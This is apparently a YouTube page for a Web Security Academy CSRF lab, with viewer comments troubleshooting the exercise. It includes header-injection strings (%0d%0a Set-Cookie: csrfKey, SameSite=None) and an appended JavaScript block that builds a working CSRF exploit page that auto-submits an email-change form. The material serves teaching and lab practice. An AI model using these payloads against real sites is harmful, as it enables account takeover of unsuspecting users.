CSRF - Lab #5 CSRF where token is tied to non-session cookie | Short Version
- Published: 26 Sep 2024
- In this video, we cover Lab #5 in the CSRF module of the Web Security Academy. This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't fully integrated into the site's session handling system. To solve the lab, we use the exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.
▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
Buy my course: academy.ranakh...
▬ 🔗 Links 🔗 ▬▬▬▬▬▬▬▬▬▬
CSRF Lab #5 long video: • CSRF - Lab #5 CSRF whe...
Notes.txt document: github.com/rkh...
CSRF theory video: • Cross-Site Request For...
Web Security Academy RUclips Video Series Release Schedule: docs.google.co...
Web Security Academy: portswigger.ne...
Rana's Twitter account: / rana__khalil
I'm 16 years old, you made me love cyber security.
Keep it up! Best CS YouTube channel I've ever seen.
Really liked the way you document the issue, prepare test scenarios and explain the exploit. Keep posting more videos.
Very good explanation of your testing process. Much appreciated. A lot of value here, more so than just showing the answer without an explanation.
Hello Rana, wow, you are such an amazing person. ❤
I've lived my 17 years of life thinking that in this whole world there is no woman who knows or cares about cybersecurity, but now I've found you, and it makes me kind of love you just the way you are 😏
Great methodical approach to the lab. Thank You for detailed explanation.
Thank you. I listen to your explanations through YouTube's automatic translation; your way of thinking amazes me and your note-taking method has won me over.
Wow, this is very helpful and made me understand the lab fully. Thanks a lot, Rana.
You ma'am, are a great instructor!! Thank you!
😍 Love ❤️ for your explanation method
Love the way you explained it, excellent teaching technique.
Hi Ma'am, love your videos, from Pakistan
I was getting the invalid CSRF error with the Chrome browser. I switched to Firefox and it worked. Note that "View exploit" still gave me a CSRF error, but when I clicked "Deliver to victim" it solved the lab. Just make sure your script is similar to the one from Rana's GitHub repository.
Is there anybody who did not solve this lab, like me? I tried a couple of times but did not solve it. What I did so far: I picked up the second user's csrfKey and CSRF token and replaced the first user's csrfKey and CSRF token with them, used the engagement tool to prepare the HTML code, but it did not work. I am not sure whether the problem is with me, because I made a mistake, or the lab is corrupted somehow?
Did you solve this problem? I have the same problem as you.
It did not work for me either... the header injection with  didn't work. Check your cookies after trying it with your exploit code. You will see you did not set your csrfKey. It's still the old one.
@a.n.678 Yeah, it did not work for me either; just append samesite=none, then it works.
@sp1460 The server already sends SameSite=None. That's not the reason why it worked. Check the cookie correctly.
Sometimes I thought an approach worked, but then it turned out that I had tried so many times that I had already saved the "correct" csrfKey and thus didn't realize that the header injection didn't work. Always open a fresh private-mode browser to be sure.
One approach that worked for me was to work with . Set the target to _blank, because you still need the original page to submit the document after a sleep. PortSwigger accepts this solution.
@a.n.678 If you don't set the SameSite in the payload it won't work.
Thanks for making this great content, appreciated \o/
That is a good explanation.
Excuse me, I have followed all the steps and I managed to add the csrfKey with "/?search" manually in Burp, but when I automate it with
Hi man, I tried so many times but this method is not working. Could you review the question and solution?
amazing video
Hi, and thanks for the great explanation, but I can't figure out why I can't solve the lab. If I test it with the CSRF tokens from carlos while logged in as wiener... it worked, so the code is correct. But if I try to send that code with fresh CSRF tokens from carlos and send it to the victim, it doesn't solve the lab =/. I tried being logged in as wiener and without a login and still nope... maybe a server/lab issue.
what happens when the application only accepts one csrf token per request and yet you have multiple targets?
I Love your videos!!
My exploit works in the "View exploit" part and the email changes, but when I click on "Deliver to victim" nothing happens.
I'm going to be happy if someone helps me solve this problem 🙏🏻
I'm unable to successfully modify the cookie with the search parameter.
You are the best! ;]
This lab took me so much time because when I log in to the other account in the same browser it shows that they have the same CSRF token value for some reason. But when I logged in in incognito it showed different CSRF tokens for the 2 accounts. Is this a bug in browsers?
hello
If it isn't solved, try adding this at the end of the csrf cookie: %3b%20SameSite=None
Yes. I couldn't solve that lab, added this attribute and it worked. This attribute is a security mechanism preventing cookies from a site from being sent to another site. Our site for our exploit is different from the site used by the victim, so we have to include that attribute.
Waiting for new lectures...
thanks, lady
Not working anymore :(, even the PoC script on GitHub doesn't work.
For those for whom this is not working, add this to the end of the search URL: %3b%20SameSite=None
This is happening because the site automatically sets SameSite=Lax, because this is the new default in Chrome, which prevents cross-site CSRF.
At the time of the video, this wasn't a browser default, therefore it worked for her.
Am I alone in receiving "invalid CSRF token" when I test the CSRF HTML in my browser?
I am getting it too. Were you able to solve it?
@heyybigdaddy6988 Not yet, I switched to CTF currently.
I haven't understood: why have you written %0d%0a? What does that mean? How do you know that?
The %0d%0a pair of characters is the signal for the end of a line and the beginning of another in a URL.
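The two points argued over in the comments above, the %0d%0a (CRLF) header injection that plants a known csrfKey through the search function and the SameSite=None attribute that several readers had to append to the search URL, can be modelled in a few lines of JavaScript. The block below is an added example; it is not code from the video, from the notes repository, or from PortSwigger. It assumes details the page does not state: that the reflected cookie is called LastSearchTerm, that the email-change form posts fields named `email` and `csrf` to /my-account/change-email, and that the cookie is planted from the exploit page with an <img> whose onerror handler submits the form.

```javascript
// Added example, not code from the video, its GitHub notes, or PortSwigger.
// Assumptions (not stated on the page): reflected cookie LastSearchTerm,
// token cookie csrfKey, form fields `email`/`csrf` posted to
// /my-account/change-email, cookie planted via <img onerror>.

const CRLF = "\r\n";

// 1. Build the injected search URL. encodeURIComponent turns CRLF into
//    %0D%0A; the server decodes it back to a raw line break before
//    reflecting the term into its Set-Cookie header.
function buildInjectionUrl(csrfKey, { sameSiteNone = true } = {}) {
  let smuggled = "Set-Cookie: csrfKey=" + csrfKey;
  if (sameSiteNone) smuggled += "; SameSite=None";
  return "/?search=x" + encodeURIComponent(CRLF + smuggled);
}

// 2. Toy model of the vulnerable endpoint (constructed): the decoded search
//    term goes straight into a response header with no CR/LF filtering.
function vulnerableSearchResponse(path) {
  const term = new URL(path, "https://lab.example").searchParams.get("search") ?? "";
  return [
    "HTTP/1.1 200 OK",
    "Set-Cookie: LastSearchTerm=" + term,
    "Content-Type: text/html",
    "",
    "<html>...</html>",
  ].join(CRLF);
}

// 3. What the browser sees: headers are split on CRLF, so the smuggled line
//    becomes a second, independent Set-Cookie header.
function parseSetCookies(rawResponse) {
  const headerBlock = rawResponse.split(CRLF + CRLF)[0];
  return headerBlock
    .split(CRLF)
    .slice(1) // drop the status line
    .filter((h) => /^set-cookie:/i.test(h))
    .map((h) => h.replace(/^set-cookie:\s*/i, ""));
}

// 4. Will the cookie ride along on a cross-site POST? A browser that
//    defaults to Lax (Chrome since version 80) only attaches it when
//    SameSite=None is explicit. Chromium additionally drops a SameSite=None
//    cookie that is not marked Secure, so that stricter rule is a flag here.
function sentOnCrossSitePost(setCookie, { requireSecureForNone = false } = {}) {
  const parts = setCookie.split(";").map((p) => p.trim());
  const attrs = new Map(
    parts.slice(1).map((p) => {
      const [k, v = ""] = p.split("=");
      return [k.toLowerCase(), v];
    })
  );
  const sameSite = (attrs.get("samesite") || "Lax").toLowerCase();
  if (sameSite !== "none") return false;
  if (requireSecureForNone && !attrs.has("secure")) return false;
  return true;
}

// 5. The exploit page: plant the cookie first, then auto-submit the form
//    whose csrf field matches the planted key (form fields are assumed).
function buildExploitHtml(labOrigin, csrfKey, csrfToken, newEmail) {
  const injectUrl = labOrigin + buildInjectionUrl(csrfKey);
  return `<form method="POST" action="${labOrigin}/my-account/change-email">
  <input type="hidden" name="email" value="${newEmail}">
  <input type="hidden" name="csrf" value="${csrfToken}">
</form>
<img src="${injectUrl}" onerror="document.forms[0].submit()">`;
}
```

Running `parseSetCookies(vulnerableSearchResponse(buildInjectionUrl("abc123")))` returns two cookies, `LastSearchTerm=x` and `csrfKey=abc123; SameSite=None`; build the URL with `{ sameSiteNone: false }` and the planted cookie defaults to Lax, which is exactly the case where `sentOnCrossSitePost` reports it would not be attached to the attacker's POST. If you reproduce this in Chrome rather than Firefox, keep the Secure requirement in mind when reading a failure.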
Does this exploitation work in the real world?
Hello ma'am,
Why do we use header injection? Why don't we proceed as in the previous sections?